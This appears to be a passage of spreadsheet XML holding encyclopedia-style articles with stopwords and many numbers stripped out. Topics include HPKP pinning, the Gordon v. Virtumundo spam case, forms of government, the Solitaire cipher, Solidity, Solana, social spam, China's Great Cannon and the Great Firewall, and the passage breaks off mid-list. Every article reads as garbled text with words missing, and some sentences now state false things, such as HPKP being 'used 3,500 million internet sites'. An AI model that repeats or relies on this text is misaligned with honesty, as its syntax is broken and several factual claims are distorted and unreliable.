domain, and/or key(s) intermediate issuing certificates, end-entity public key. least backup must pinned, case current pinned needs replaced. hpkp valid without backup backup defined public present current certificate chain).hpkp standardized 7469. expands static certificate pinning, hardcodes public hashes well-known websites services within browsers applications.most browsers disable pinning certificate chains private root certificates enable various corporate content inspection scanners debugging tools (such mitmproxy fiddler). 7469 standard recommends disabling pinning violation reports "user-defined" root certificates, "acceptable" browser disable validation. reporting user agent performs validation fails find valid spki fingerprint served certificate chain, post json formatted violation report host specified report-uri directive containing details violation. this served http https; however, user agent cannot send hpkp violation reports https domain domain reporting violation. hosts either http report-uri, alternative domain, reporting service.some browsers also support public-key-pins-report-only, triggers reporting showing error user. criticism decline during peak adaptation, hpkp reported used 3,500 million internet sites, figure declined around 2019.criticism concern revolved around malicious human error scenarios known hpkp suicide ransompkp. scenarios, website owner would ability publish contents domain severely hampered either losing access keys keys announced malicious attacker. browser support deprecation also certificate authority compromise certificate transparency http strict transport security list http header fields certification authority authorization public pinning extension http (hpkp) docs references</t>
  </si>
  <si>
    <t>Gordon v. Virtumundo, Inc.</t>
  </si>
  <si>
    <t>gordon virtumundo, inc., f.3d 1040, 2009 court opinion united states court appeals ninth circuit addressed standing requirements necessary private plaintiffs bring suit controlling assault non-solicited pornography marketing 2003, can-spam 2003, u.s.c. 103, well scope can-spam act's federal preemption. prior case, can-spam act's standing requirements addressed court appeals level, fourth circuit addressed can-spam act's preemptive scope. background james gordon, ("gordon"), manager sole member omni innovations, ("omni"), self-described "spam-business". omni's business model consisted bringing suit entities sending unsolicited commercial email, spam, various anti-spam statutes profiting either settlement agreements statutory damage awards. spam spam-suit business, gordon, omni, leased server space godaddy, domain registrar hosting company. used server space host domain name, gordonworks.com, create email addresses several friends family members using domain name.gordon registered gordonworks.com email addresses online promotions, eventually joining email mailing lists. result, accounts received thousands spam emails. gordon took control accounts, instructing friends family create domain names email addresses omni's server space. configured gordonworks.com addresses respond commercial emails automated message "contract" senders agreed stop sending spam $500 piece unsolicited commercial email.in 2004, spam stop, gordon omni began companies sent spam email addresses omni's server space. omni generated revenue except settlement agreements spam-related lawsuits. procedure virtumundo, inc. adknowledge, inc. internet marketing companies sent spam omni-hosted accounts. 2006, gordon omni sued virtumundo, inc., adknowledge, inc., scott lynn, sole shareholder companies (collectively, "virtumundo"), united states district court western district washington, alleging violations federal can-spam related washington state claims.gordon omni argued virtumundo's emails violated can-spam contained misleading headers, section 7704 can-spam prohibits "header information materially false materially misleading." gordon omni also claimed headers violated washington commercial electronic mail ("cema"), wash. rev. code 19.190.010 seq., prohibits commercial emails "misrepresent[] obscure[] information identifying point origin transmission path commercial electronic message". finally, gordon omni claimed emails constituted "unfair deceptive acts practices conduct commerce" violation washington consumer protection ("cpa"), wash. rev. code. 19.86.020, violated washington "prize statute", wash. rev. code. 19.170.010 seq. terms relief, gordon omni sought statutory damages, opposed damages based actual harm.the district court dismissed gordon omni's washington prize statute claims pleading deficiencies. virtumundo moved summary judgment gordon omni's remaining can-spam act, washington cema, washington claims. district court ruled favor virtumundo, holding gordon omni lacked standing bring action can-spam federal can-spam preempted cema claims. gordon omni appealed summary judgment ruling ninth circuit. timeline presented rough outline major events legal proceedings (table adapted issues gordon omni standing bring can-spam action? can-spam pre-empt gordon omni's state claims? holding appeals court found gordon omni standing can-spam omni "internet access service" provider. omni "adversely affected" spam. discussion holding omni internet service provider can-spam act? can-spam primarily provides government actors (the federal trade commission state attorneys general) enforce provisions, however section 7706(g) creates limited private cause action "provider[s] internet access service adversely affected violation act. address standing issue, court appeals therefore needed assess whether omni internet access service ("ias") provider, whether "adversely affected" within meaning statute. court first addressed issue whether omni provider. section 7702 can-spam defines "internet access service" reference u.s.c. 231, states: interpret definition, court first attempted determine congress's intent, concluded congress intended private cause action narrowly construed. court noted congress could contemplated complete eradication spam broad private action text can-spam explicitly recognizes "[e]lectronic mail become extremely important popular means communication". although court held definition provider limited traditional internet service providers (isp), providing email accounts alone, gordon omni done, sufficient satisfy statutory definition. court declined state exactly would needed, noted godaddy.com retained physical control server hardware verizon internet service provider enabled gordon's access internet would "have compelling argument providers."in addition, legislative history indicated congress intended private cause action extend "bona fide providers" suffering spam-related network slowdowns technical difficulties opposed opportunistic plaintiffs suing profit awards statutory damages. virtumundo's spam adversely affect omni? court went address whether omni "adversely affected" virtumundo's spam. although can-spam specify meaning "adversely affected", court held statute required "network crashes, higher bandwidth utilization, increased costs hardware software upgrades, network expansion additional personnel"; words, harms might experienced typical internet service providers, mere inconvenience ordinary email consumers. since omni experienced problems, actually profited spam lawsuit settlements, "adversely affected". can-spam preempted omni's state claims? next, court addressed whether gordon omni's remaining state claims preempted can-spam act's express preemption clause, contained within u.s.c. 7707(b): pursuant clause, can-spam preempts state regulation commercial electronic messages, "except extent statute prohibits falsity deception." question court appeals scope exception. court looked first dictionary definitions "deception" "falsity", found deception could easily defined referring "something immaterial inaccuracies inadvertent mistakes"; words material misrepresentation fraud. however, definition falsity ambiguous.to interpret term "falsity", court looked can-spam act's text legislative history determine congressional intent. legislative history indicated congress intended can-spam national standard regulation commercial email order spare businesses deal different standards fifty states. addition, language immediately following preemption clause provides can-spam preempt "(a) state laws specific electronic mail, including state trespass, contract, tort law; state laws extent laws relate acts fraud computer crime."from facts, court concluded congress intended "falsity" "deception" exception read narrowly. states allowed "extend traditional tort theories claims arising fraud deception commercial e-mail communication", more. thus state claims based immaterial misrepresentations would preempted can-spam act, though state claim fraud would survive. applying gordon omni's case, court concluded gordon omni's washington cema washington claims preempted gordon omni alleged facts rose level "falsity deception" within meaning can-spam act. concurrence judge gould wrote concurring opinion agreed main opinion, would held gordon lacked standing solely suing profit opposed seeking recovery injury. judge gould distinguished can-spam act's limited private cause action anti-discrimination statutes, americans disabilities act, congress included broad private causes action statutory damages provisions encourage citizens "test" discrimination. implications failure gordon's technical infractions can-spam precedent future anti-spam cases. judge tallman find gordon's technical infractions can-spam convincing; therefore, individuals fighting spam unable claim status legal basis. addition, holding also diminished importance state anti-spam laws given preemption federal can-spam law. subsequent cases asis internet services azoogle.com: united states court appeals ninth circuit dismissed claims can-spam lack standing plaintiff claimed cost implementing spam-filtering programs constituted "adverse effects." court held "such ordinary filtering costs constitute harm," "the mere cost carrying spam emails plaintiff's facilities constitute harm required statute." asis internet services subscriberbase: united states district court northern district california held can-spam pre-empt california's anti-spam statute, california business professions code 17529.5, plaintiff based claims deceptive email headers. court require plaintiff plead elements common fraud specifically, reliance damages escape preemption, although court noted district courts california previously split issue. hypertouch, inc. valueclick, inc.: california court appeal also held plaintiff asserting claims california business professions code 17529.5 required establish reliance damages escape preemption can-spam act. melaleuca, inc. hansen: united states district court district idaho held owner domain name lacked standing can-spam where, similar omni, provided email internet access third party internet service provider, failed allege harms rising routine business expenses. defendant case emailed plaintiff's employees encouraging join defendant's company opposed plaintiff corporation). plaintiff later attempted defendant claims; court held action barred doctrine collateral estoppel. references external links gordon virtumundo, inc. f.3d 1040 (2009) omni innovations ascentive gordon virtumundo: smacks down anti-spammers trifecta defense</t>
  </si>
  <si>
    <t>Government</t>
  </si>
  <si>
    <t>government system group people governing organized community, generally state. case broad associative definition, government normally consists legislature, executive, judiciary. government means organizational policies enforced, well mechanism determining policy. many countries, government kind constitution, statement governing principles philosophy. while types organizations governance, term government often used specifically refer approximately independent national governments subsidiary organizations. historically prevalent forms government include monarchy, aristocracy, timocracy, oligarchy, democracy, theocracy, tyranny. these forms always mutually exclusive, mixed governments common. main aspect philosophy government political power obtained, main forms electoral contest hereditary succession. definitions etymology government system govern state community. columbia encyclopedia defines government system social control right make laws, right enforce them, vested particular group society". while types organizations governance, word government often used specifically refer approximately independent national governments earth, well subsidiary organizations, state provincial governments well local governments.the word government derives greek verb κυβερνάω [kubernáo] meaning steer gubernaculum (rudder), metaphorical sense attested literature classical antiquity, including plato's ship state. british english, "government" sometimes refers what's also known "ministry" "administration", i.e., policies government officials particular executive governing coalition. finally, government also sometimes used english synonym rule governance. history moment place phenomenon human government developed lost time; however, history record formations early governments. about 5,000 years ago, first small city-states appeared. third second millenniums developed larger governed areas: sumer, ancient egypt, indus valley civilization, yellow river civilization.the development agriculture water control projects catalyst development governments. occasion chief tribe elected various rituals tests strength govern tribe, sometimes group elder tribesmen council. human ability precisely communicate abstract, learned information allowed humans become ever effective agriculture, allowed ever increasing population densities. david christian explains resulted states laws governments. farming populations gathered larger denser communities, interactions different groups increased social pressure rose until, striking parallel star formation, structures suddenly appeared, together level complexity. like stars, cities states reorganize energize smaller objects within gravitational field. starting 17th century, prevalence republican forms government grew. glorious revolution england, american revolution, french revolution contributed growth representative forms government. soviet union first large country communist government. since fall berlin wall, liberal democracy become even prevalent form government.in nineteenth twentieth century, significant increase size scale government national level. this included regulation corporations development welfare state. political science classification political science, long goal create typology taxonomy polities, typologies political systems obvious. especially important political science fields comparative politics international relations. like categories discerned within forms government, boundaries government classifications either fluid ill-defined. superficially, governments official ideal form. united states constitutional republic, former soviet union socialist republic. however self-identification objective, kopstein lichbach argue, defining regimes tricky. example, voltaire argued "the holy roman empire neither holy, roman, empire".identifying form government also difficult many political systems originate socio-economic movements carried governments parties naming movements; competing political-ideologies. experience movements power, strong ties particular forms government, cause considered forms government themselves. other complications include general non-consensus deliberate "distortion bias" reasonable technical definitions political ideologies associated forms governing, nature politics modern era. example: meaning "conservatism" united states little common word's definition used elsewhere. ribuffo notes, "what americans call conservatism much world calls liberalism neoliberalism"; "conservative" finland would labeled "socialist" united states. since 1950s conservatism united states chiefly associated republican party. however, segregation many southern democrats conservatives, played role conservative coalition controlled congress 1937 1963. social-political ambiguity opinions vary individuals concerning types properties governments exist. "shades gray" commonplace government corresponding classification. even liberal democracies limit rival political activity extent another tyrannical dictatorships must organize broad base support thereby creating difficulties "pigeonholing" governments narrow categories. examples include claims united states plutocracy rather democracy since american voters believe elections manipulated wealthy super pacs. forms republic, plato discusses five types regimes: aristocracy, timocracy, oligarchy, democracy, tyranny. these five regimes progressively degenerate starting aristocracy tyranny bottom.in politics, aristotle elaborates plato's five regimes discussing relation government one, few, many. from follows classification forms government according people authority rule: either person autocracy, monarchy), select group people aristocracy), people whole democracy, republic). thomas hobbes stated classification: difference commonwealths consisteth difference sovereign, person representative every multitude. sovereignty either man, assembly one; assembly either every hath right enter, every one, certain distinguished rest; manifest three kinds commonwealth. representative must needs man, more; more, assembly all, part. when representative man, commonwealth monarchy; assembly come together, democracy, popular commonwealth; assembly part only, called aristocracy. other kind commonwealth none: either one, more, all, must sovereign power (which shown indivisible) entire. autocracy autocracy system government supreme power concentrated hands person, whose decisions subject neither external legal restraints regularized mechanisms popular control (except perhaps implicit threat coup d'état mass insurrection). absolute monarchy historically prevalent form autocracy, wherein monarch governs singular sovereign limitation royal prerogative. most absolute monarchies hereditary, however some, notably holy see, elected electoral college (such college cardinals, prince-electors). other forms autocracy include tyranny, despotism, dictatorship. aristocracy aristocracy form government places power hands small, elite ruling class, hereditary nobility privileged caste. this class exercises minority rule, often landed timocracy, wealthy plutocracy, oligarchy. many monarchies aristocracies, although modern constitutional monarchies monarch little effective power. term aristocracy could also refer non-peasant, non-servant, non-city classes feudal system. democracy democracy system government citizens exercise power voting deliberation. direct democracy, citizenry whole directly forms participatory governing body vote directly issue. indirect democracy, citizenry governs indirectly selection representatives delegates among themselves, typically election less commonly, sortition. these select citizens meet form governing body, legislature jury. some governments combine direct indirect democratic governance, wherein citizenry selects representatives administer day-to-day governance, also reserving right govern directly popular initiatives, referenda (plebiscites), right recall. constitutional democracy powers majority exercised within framework representative democracy, constitution limits majority rule, usually provision certain universal rights, e.g. freedom speech, freedom association. republics republic form government country considered "public matter" (latin: publica), private concern property rulers, offices states subsequently directly indirectly elected appointed rather inherited. people, significant portion them, supreme control government offices state elected chosen elected people.a common simplified definition republic government head state monarch. montesquieu included democracies, people share rule, aristocracies oligarchies, people rule, republican forms government.other terms used describe different republics include democratic republic, parliamentary republic, semi-presidential republic, presidential republic, federal republic, people's republic, islamic republic. federalism federalism political concept group members bound together covenant governing representative head. term "federalism" also used describe system government sovereignty constitutionally divided central governing authority constituent political units, variously called states, provinces otherwise. federalism system based upon democratic principles institutions power govern shared national provincial/state governments, creating often called federation. proponents often called federalists. branches governments typically organised distinct institutions constituting branches government particular powers, functions, duties, responsibilities. distribution powers institutions differs governments, functions number branches. independent, parallel distribution powers branches government separation powers. shared, intersecting, overlapping distribution powers fusion powers. governments often organised three branches separate powers: legislature, executive, judiciary; sometimes called trias politica model. however, parliamentary semi-presidential systems, branches government often intersect, shared membership overlapping functions. many governments fewer additional branches, independent electoral commission auditory branch. party system presently, governments administered members explicitly constituted political party coordinates activities associated government officials candidates office. multiparty system government, multiple political parties capacity gain control government offices, typically competing elections, although effective number parties limited. majority government government governing parties together holding absolute majority seats parliament, contrast minority government plurality seats often depend confidence supply arrangement parties. coalition government multiple parties cooperate form government part coalition agreement. single-party government single party forms government without support coalition, typically case majority governments, even minority government consist party unable find willing coalition partner moment.a party continuously maintains single-party government within (nominally) multiparty system constitutes dominant-party system. (nondemocratic) party system single ruling party (more less) exclusive right form government, formation parties obstructed illegal. cases, government non-partisan system, case absolute monarchy non-partisan democracy. maps also notes references bibliography further reading mesquita, bruce bueno; smith, alastair (2012). dictator's handbook: behavior almost always good politics. york: publicaffairs. isbn 9781610390446. oclc 1026803822. mesquita, bruce bueno; smith, alastair; siverson, randolph morrow, james (2003). logic political survival. cambridge, massachusetts: press. isbn 9780262025461. oclc 475265120. dobson, william (2013). dictator's learning curve: inside global battle democracy. york: anchor. isbn 978-0307477552. oclc 849820048. friedrich, carl brzezinski, zbigniew (1966) [1965]. totalitarian dictatorship autocracy (2nd ed.). york: frederick praeger. isbn 9780674895652. oclc 826626632. krader, lawrence (1968). formation state. foundations modern anthropology. englewood cliffs, jersey: prentice-hall. isbn 0133294900. oclc 266086412.</t>
  </si>
  <si>
    <t>Governments</t>
  </si>
  <si>
    <t>Gowanus E-Waste Warehouse</t>
  </si>
  <si>
    <t>lower east side ecology center, also known ecology center, environmental organization founded 1987, focusing urban sustainability, providing e-waste composting services, environmental stewardship opportunities, educational programming. e-waste warehouse 2003, ecology center started electronic waste (e-waste) program focusing e-waste recycling. artists-in-residence e-waste warehouse hosts artist residence time. artist-in-residence given studio space warehouse invited engage make e-waste center collects. 2019–2020, skateboarder artist louis sarowsky artist-in-residence center. used recycled materials sculptures performances, making body-suit covered tape. e-waste warehouse gallery references</t>
  </si>
  <si>
    <t>Solitaire (cipher)</t>
  </si>
  <si>
    <t>solitaire cryptographic algorithm designed bruce schneier request neal stephenson novel cryptonomicon, field agents communicate securely without rely electronics carry incriminating tools. designed manual cryptosystem calculated ordinary deck playing cards. cryptonomicon, algorithm originally called pontifex hide fact involved playing cards. motivations behind solitaire's creation totalitarian environments, deck cards affordable (and less incriminating) personal computer array cryptological utilities. however, schneier warns appendix cryptonomicon, everyone interest cryptanalysis know algorithm, carrying deck cards also considered incriminating. furthermore, analysis revealed flaws cipher considered insecure. encryption decryption this algorithm uses standard deck cards suited cards jokers distinguishable other, called joker joker. simplicity's sake, suits used example, clubs diamonds. each card assigned numerical value: clubs numbered (ace king) diamonds numbered manner. jokers assigned values thus, jack clubs would value diamonds would value full deck cards, suits valued bridge order: clubs, diamonds, hearts, spades, suited cards numbered jokers numbered 54.) begin encryption decryption, arrange deck cards face-up order previously agreed upon. person decrypting message must deck arranged order deck used person encrypted message. order initially decided upon recipients; shuffling deck perfectly randomly preferable, although many methods. algorithm generates keystream, sequence values combined message encrypt decrypt each value keystream used encrypt character message, keystream must least long message. keystream longer message, message padded additional repeated character, thus denying attacker knowledge exact length message. encrypt message: remove punctuation spaces, leaving letters a–z. convert letter natural numerical value, ..., generate keystream value letter message using keystream algorithm below. keystream value corresponding plaintext number, subtracting resulting value greater mathematics called modular arithmetic.) convert resulting numbers back letters. this sequence letters ciphertext.to decrypt ciphertext: convert letter ciphertext natural numerical value. generate keystream value letter ciphertext. subtract keystream value corresponding ciphertext value, adding resulting value less convert resulting numbers back letters. keystream algorithm this algorithm generates keystream values moving cards within deck. keystream algorithm deterministic, keystream values depend initial order deck. deck assumed circular array, meaning card ever need advance bottom card deck, simply rotate back words, first card follows last card). take example starting deck: 26perform steps generate character keystream. locate joker (value move deck place. last card, becomes second card. there become first card. deck looks like this: locate joker (value move deck places. notice second last card, becomes second card wrapping around. last card, becomes third card. there become first card. perform "triple cut": split deck three sections. everything joker (which, several repetitions, necessarily joker) everything bottom joker exchanged. jokers themselves, cards them, left untouched. perform "count cut": observe value card bottom deck. card either joker take value remove number cards deck insert last card deck. now, look value card. again, either joker counts count many places card take value card next value keystream. card counted either joker, ignore repeat keystream algorithm. example card count 24th card, thus keystream value (note cards change places step, step simply determines keystream value). cryptanalysis 1999 paul crowley discovered bias towards repeating characters keystream, occur every 1/22.5 characters rather expected 1/26. result, solitaire leaks information rate 0.0005 bits character. while security perhaps adequate short messages, general solitaire considered insecure. crowley also noticed cases, different deck configurations result configuration executing keystream algorithm. instance, joker either bottom deck deck become second card step this means algorithm always reversible schneier originally claimed.in 2019 daniel shiu proposed modifications algorithm would increase security, cost making difficult user implement manually. references external links schneier's solitaire description</t>
  </si>
  <si>
    <t>Solidity</t>
  </si>
  <si>
    <t>solidity object-oriented programming language implementing smart contracts various blockchain platforms, notably, ethereum. developed christian reitwiessner, alex beregszaszi, several former ethereum core contributors. programs solidity ethereum virtual machine. history solidity proposed august 2014 gavin wood; language later developed ethereum project's solidity team, christian reitwiessner. solidity primary language ethereum well private blockchains, enterprise-oriented hyperledger fabric blockchain. swift deployed proof concept using solidity running hyperledger fabric. description solidity statically typed programming language designed developing smart contracts ethereum virtual machine (evm).solidity uses ecmascript-like syntax makes familiar existing developers; however unlike ecmascript static typing variadic return types. solidity different evm-targeting languages serpent mutan important ways. supports complex member variables contracts, including arbitrarily hierarchical mappings structs. solidity contracts support inheritance, including multiple inheritance linearization. solidity introduces application binary interface (abi) facilitates multiple type-safe functions within single contract (this also later supported serpent). solidity proposal also includes "natural language specification", documentation system specifying user-centric descriptions ramifications method-calls.example solidity program: development platform availability erisdb hardhat microsoft visual studio microsoft visual studio code tendermint microsoft azure remix ethereum blockchain platforms solidity available ethereum binance smart chain ethereum classic avalanche c-chain counterparty (which runs bitcoin) tron hedera hashgraph criticism many security properties smart contracts inherently difficult reason directly, turing-completeness solidity means verification arbitrary properties cannot decidably automated. current automated solutions smart contract security analysis miss critical violations, produce false positives, fail achieve sufficient code coverage realistic contracts. solidity blamed error-prone implementation ethereum smart contracts counterintuitive nature, lack constructs deal blockchain domain-specific aspects, lack centralized documentation known vulnerabilities.in 2016, cornell university researcher stated solidity partially blame hack took place year. stated: "this actually flaw exploit contract itself: technically ethereum virtual machine (evm) operating intended, solidity introducing security flaws contracts missed community, missed designers language themselves." limitations solidity unlike programs traditional programming languages, debugged, solidity contracts mistakes cannot edited fixed; transactions cannot reversed. solidity follows "code law" mantra, means smart contract must flawlessly coded comes effect. there hacking cases aforementioned 2016 hack us$60 million stolen, 2021 hack caused fork ethereum system. prevent technical errors mistakes, coinbase, largest cryptocurrency exchange introduced tool named solidify. this tool auditing system detects classifies smart contract risks. references</t>
  </si>
  <si>
    <t>Grandmaster Ratte'</t>
  </si>
  <si>
    <t>grandmaster ratte' (born kevin wheeler april 1970 formerly known swamp swamp ratte') founders cult dead hacker group, along franken gibe vicious. official title "imperial wizard exxxtasy." references external links phrack magazine profile grandmaster ratte' damage, inc. magazine interview</t>
  </si>
  <si>
    <t>Graviner</t>
  </si>
  <si>
    <t>graviner british engineering company makes oxygen (life support) fire extinguishing systems civil military aircraft. name portmanteau gravity inertia. history company independently operational 1933 1980 component united technologies corporation (utc). explosion suppression 1930s, graviner manufacturing company gosport, made graviner extinguisher, explosion-suppression system, operated prevent fuel catching fire aircraft crash. system deployed compound carbon tetrachloride, forerunner modern gaseous extinguishing agents collectively referred halon. fire detection early 1950s made product called graviner firewire detected fires onboard aircraft. company based buckinghamshire. july 1966 contract provide fire detection suppression systems concorde. also made fire detection systems marine craft; makes well-known mist detector. 1983 provided fire detection suppression systems world land speed record thrust2. 1984 introduced world's first microprocessor-controlled engine fire detection system. 1980s, half world's boeing 747s carried technology. 1991 contract provide fire detection systems experimental lockheed yf-22, subsequently evolved many years later lockheed martin f-22 raptor, entering service usaf around 2006. nuclear energy early 1960s nuclear energy division. ownership 1980s owned allegheny international. 1980s part group similar company, deugra, based near düsseldorf. bought, deugra, £24m 1986 group (bearings). late 1980s, group become pilgrim house group. company part united technologies corporation (utc). business colnbrook closed december 2017. production transferred sister company, l'hotellier paris. also darchem engineering, stockton-on-tees, makes fire suppression systems. pains wessex, former british company made similar life-saving equipment category:airliner accidents incidents caused in-flight fires references times, august 1962, page times, september 1966, page</t>
  </si>
  <si>
    <t>Solana (blockchain platform)</t>
  </si>
  <si>
    <t>solana public blockchain platform smart contract functionality. native cryptocurrency sol. history solana proposed white paper anatoly yakovenko published november 2017. this paper described technique called "proof history".on march 2020, solana's first block created.in september 2021, bloomberg journalist joanna ossinger said investors argued solana potential long-term rival ethereum", citing superior transaction speeds lower associated costs.on september 2021, solana blockchain went offline surge transactions caused network fork, different validators different views state network. network brought back online next september 2021.on december 2021, former first lady united states melania trump announced plans solana launch non-fungible token (nft). solana foundation issued press release clarify choice platform officially "part solana-led initiative."the solana blockchain went offline 1st, 2022 31st, 2022. outage beginning month lasted roughly seven hours, month lasted four half hours.on august 2022, announced solana ecosystem targeted hackers, affecting 7,900 solana wallets. four solana wallet addresses took approximately million total victims. root cause hack unknown. lawsuit july 2022, class action lawsuit filed solana. lawsuit accused solana selling unregistered securities tokens form solana (sol) march 2020, onward solana deliberately misled investors concerning total circulating supply tokens. according lawsuit, anatoly yakovenko, founder solana labs, lent market maker 11.3 million tokens april 2020 failed disclose information public. lawsuit claimed solana stated would reduce supply amount, burned million tokens. design solana achieves consensus using proof-of-stake mechanism "proof-of-history" mechanism.like various blockchains, solana smart contracts. solana's execution environment based ebpf, allows rust, programming languages used. also list cryptocurrencies bitcoin ethereum decentralized finance references external links official website</t>
  </si>
  <si>
    <t>Social spam</t>
  </si>
  <si>
    <t>social spam unwanted spam content appearing social networking services, social bookmarking sites, website user-generated content (comments, chat, etc.). manifested many ways, including bulk messages, profanity, insults, hate speech, malicious links, fraudulent reviews, fake friends, personally identifiable information. history email spam filters became effective, catching messages, spammers moved target social web. over social network users experienced social spam form. those “spamming” automated spambots/social bots, fake accounts, real people. social spammers often capitalize breaking news stories plant malicious links dominate comment sections websites disruptive offensive content.social spam rise, analysts reporting tripling social spam activity months. estimated social user accounts fake, depending site. august, 2012, facebook admitted updated regulatory filing 8.7% million active accounts fake. types spam commercial spam comment commercial content irrelevant discussion hand. many email spam content resurfaced social networks, viagra ads, work-from-home scams, counterfeit merchandise. recent analysis showed social spammers content preferences changing slightly, apparel sports accounting posts. others included: porn pills (16%), seo/web development (23%), mortgage loans (12%). social networking spam social networking spam spam directed specifically users internet social networking services google+, facebook, pinterest, linkedin, myspace. experts estimate many social network accounts used spam. these spammers utilize social network's search tools target certain demographic segments, common pages groups send notes fraudulent accounts. such notes include embedded links pornographic product sites designed sell something. response this, many social networks included "report spam/abuse" button address contact. spammers, however, frequently change address throw-away account another, thus hard track.facebook pages pictures text asking readers e.g. "show support" "vote" used gather likes, comments shares improve pages' ranking. page slightly changed sold profit. bulk bulk submissions comments repeated multiple times similar text. these messages, also called spam-bombs, come form spammer sending duplicate messages group people short period time, many active spam accounts simultaneously posting duplicate messages. bulk messages cause certain topics hashtags trend highly. example, 2009, large number spam accounts began simultaneously posting links website, causing ‘ajobwithgoogle’ trend. profanity user-submitted comments contain swear words slurs classified profanity. common techniques circumvent censorship include “cloaking”, works using symbols numbers place letters inserting punctuation inside word (for example, "w.o.r.d.s" instead "words"). words still recognizable human eye, though often missed website monitors misspelling. insults user-submitted insults comments contain mildly strongly insulting language specific person persons. these comments range mild name-calling severe bullying. online bullies often insults interactions, referred cyberbullying. hiding behind screen name allows users mean, insulting comments anonymity; bullies rarely take responsibility comments actions. threats user-submitted threats violence comments contain mild strong threats physical violence person group. september 2012, eric arrested making threats espn comment section. started discussing high price lebron james shoes, quickly turned stream racist insulting comments, threats children. this serious example social spam. hate speech user-submitted hate speech comment contains strongly offensive content directed people specific race, gender, sexual orientation, etc. according council europe survey, across european union, respondents encountered hate speech online; felt personally attacked threatened; posted hate speech themselves. malicious links user-submitted comments include malicious links inappropriately harm, mislead, otherwise damage user computer. these links commonly found video entertainment sites, youtube. when user clicks malicious link, result include downloading malware user's device, directing user sites designed steal personal information, drawing unaware users participating concealed advertising campaigns, harmful consequences. malware dangerous user, manifest several forms: viruses, worms, spyware, trojan horses, adware. fraudulent reviews fraudulent reviews reviews product service users never actually used therefore insincere misleading. these often solicited proprietor product service, contracts positive reviews, known “reviews-for-hire”. some companies attempting tackle problem warning users reviews genuine. fake friends fake friends occurs several fake accounts connect become “friends”. these users spambots often gain credibility following verified accounts, popular celebrities public figures. account owner follows spammer back, legitimizes spam account, enabling damage. personally identifiable information user-submitted comments inappropriately display full names, physical addresses, email addresses, phone numbers, credit card numbers considered leaks personally identifiable information (pii). also forum spam posts internet forums contains related unrelated advertisements messaging spam spam blogs form spamdexing television advertisement paid commercial segment television wiki spam references external links</t>
  </si>
  <si>
    <t>Great Cannon</t>
  </si>
  <si>
    <t>great cannon china internet attack tool used chinese government launch distributed denial-of-service attacks websites performing man-in-the-middle attack large amounts traffic injecting code causes end-user's browsers flood traffic targeted websites. according researchers citizen lab, international computer science institute, princeton university's center information technology policy, coined term, great cannon hijacks foreign traffic intended chinese websites re-purposes flood targeted servers enormous amounts traffic attempt disrupt operations. while co-located great firewall, great cannon separate offensive system, different capabilities design."besides launching denial-of-service attacks, tool also capable monitoring traffic distributing malware targeted attacks ways similar quantum insert system used u.s. national security agency. mechanism great cannon hijacks insecure traffic inbound servers within great firewall, injects javascript redirects traffic target. these attacks fail websites https encryption. known uses first known targets great cannon late march 2015) websites hosting censorship-evading tools, including github, web-based code hosting service, greatfire, service monitoring blocked websites china.in 2017, great cannon used attack mingjing news website.as december 2019, great cannon used attempt take hong kong-based lihkg online forum, even though basic hong kong clearly states hong kong's internet affairs hong kong hong kong only. reaction quartz reported 2015 github attack caused "severe" political problems china, including united states department state viewing attack infrastructure". also internet censorship china references</t>
  </si>
  <si>
    <t>Great Firewall</t>
  </si>
  <si>
    <t>great firewall (gfw; simplified chinese: 防火长城; traditional chinese: 防火長城; pinyin: fánghuǒ chángchéng) combination legislative actions technologies enforced people's republic china regulate internet domestically. role internet censorship china block access selected foreign websites slow cross-border internet traffic. great firewall operates checking transmission control protocol (tcp) packets keywords sensitive words. keywords sensitive words appear packets, access closed. link closed, links machine blocked great firewall. effect includes: limiting access foreign information sources, blocking foreign internet tools (e.g. google search, facebook, twitter, wikipedia, others) mobile apps, requiring foreign companies adapt domestic regulations.besides censorship, great firewall also influenced development china's internal internet economy giving preference domestic companies reducing effectiveness products foreign internet companies. techniques deployed chinese government maintain control great firewall include modifying search results terms, following weiwei’s arrest, petitioning global conglomerates remove content, happened petitioned apple remove quartz business news publication’s chinese store reporting 2019–2020 hong kong protests.the great firewall formerly operated siio, part golden shield project. since 2013, firewall technically operated cyberspace administration china (cac), entity charge translating chinese communist party's doctrine policy technical specifications.as mentioned "one country, systems" principle, china's special administrative regions (sars) hong kong macau affected firewall, sars governmental legal systems therefore enjoy higher degree autonomy. nevertheless, u.s. state department reported central government authorities closely monitored internet regions, hong kong's national security used block websites documenting anti-government protests.the term great firewall china combination word firewall great wall china. phrase "great firewall china" first used print australian sinologist geremie barmé 1997. history favorite saying deng xiaoping's early 1980s, open window, fresh flies blown in", considered political ideological basis project. saying related period economic reform china became known "socialist market economy". superseding political ideologies cultural revolution, reform china towards market economy opened market foreign investors. nonetheless, despite economic freedom, values political ideas chinese communist party protected "swatting flies" unwanted ideologies.the internet china arrived 1994, inevitable consequence supporting tool "socialist market economy". gradually, internet availability increasing, internet become common communication platform tool trading information. ministry public security took initial steps control internet 1997, issued comprehensive regulations governing use. sections, articles 4–6, are: individuals prohibited using internet harm national security; disclose state secrets; injure interests state society. users prohibited using internet create, replicate, retrieve, transmit information incites resistance constitution, laws, administrative regulations; promoting overthrow government socialist system; undermining national unification; distorting truth, spreading rumors, destroying social order; providing sexually suggestive material encouraging gambling, violence, murder. users prohibited engaging activities harm security computer information networks using networks changing network resources without prior approval. 1998, chinese communist party feared china democracy party (cdp) would breed powerful network party elites might able control. immediately banned, followed arrests imprisonment. that year, project started. first part project lasted eight years completed 2006. second part began 2006 ended 2008. december 2002, people charge project provinces cities throughout china participated four-day inaugural "comprehensive exhibition chinese information system". exhibition, many western high-tech products, including internet security, video monitoring human face recognition purchased. estimated around 30,000–50,000 police employed gigantic project. fang binxing known substantial contribution china's internet censorship infrastructure, dubbed "father china's great fire wall". origins chinese internet china's view internet "internet sovereignty": notion internet inside country part country's sovereignty governed country.while united states several western countries passed laws creating computer crimes beginning 1970s, china legislation 1997. that year, china's sole legislative body national people's congress (npc) passed cl97, criminalizes "cyber crimes", divided broad categories: crimes target computer networks, crimes carried computer networks. behavior illegal latter category includes, among many things, dissemination pornographic material, usurping "state secrets."some chinese judges critical cl97, calling ineffective unenforceable. however, claimed intentionally left "flexible" could open future interpretation development. given gaps law, central government china relies heavily administrative body, state council, determine falls definitions, determinations required legislative process. result, chinese communist party ended relying heavily state regulation carry cl97.the latter definition online activities punishable cl97, "crimes carried computer networks", used justification great firewall, cited government blocks isp, gateway connections, access anything internet. definition also includes using internet distribute information considered "harmful national security," using internet distribute information considered "harmful public order, social stability, chinese morality." central government relies heavily state council regulators determine specific online behavior speech fall definitions.the reasons behind internet censorship china include: social control: 